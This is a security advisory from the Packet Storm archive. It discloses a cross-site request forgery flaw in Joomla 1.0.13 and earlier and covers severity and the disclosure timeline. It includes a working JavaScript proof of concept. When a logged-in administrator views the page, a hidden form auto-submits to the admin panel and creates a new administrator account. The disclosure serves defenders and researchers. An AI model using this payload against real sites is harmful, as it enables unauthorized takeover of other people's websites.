what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

joomla1013-csrf.txt

joomla1013-csrf.txt
Posted Jan 8, 2008
Authored by J. Carlos Nieto

Joomla! versions 1.0.13 and below suffer form cross site request forgery vulnerabilities. Exploit included that will force an administrator to add a user upon a simple page view.

tags | exploit, vulnerability, csrf
SHA-256 | 5f5666dd9a8910fbf3357eab4fe29bba19880065cc8ac1858ea8efeb10276990

joomla1013-csrf.txt

Change Mirror Download
Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross Site Request Forgery security hole in Joomla 1.0.13.


Background
==========

*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.


Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.


Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit, this exploit can execute (without permission)
any command the administrator would normally execute, such as publish a content or even add a new
administrator.


Solution
========
This problem has no solution at this time.


Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.


Proof of Concept
================

If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

var url = "http://joomlasite.com/joomla/administrator/index2.php";


var gid = 25;

var user = 'custom_username';

var pass = 'custom_password';

var email = 'joe_cool@example.com';

var param = {

name: user,

username: user,

email: email,

password: pass,

password2: pass,

gid: gid,

block: 0,

option: 'com_users',

task: 'save',

sendEmail: 1

};


var form = document.createElement('form');

form.action = url;

form.method = 'post';

form.target = 'hidden';

form.style.display = 'none';


for (var i in param) {

try {

// ie

var input = document.createElement('<input name="'+i+'">');

} catch(e) {

// other browsers

var input = document.createElement('input');

input.name = i;

}

input.setAttribute('value', param[i]);

form.appendChild(input);

}

document.body.appendChild(form);


form.submit();

}

</script>


<iframe name="hidden" style="display: none"></iframe>


<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

---- exploit code ----

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close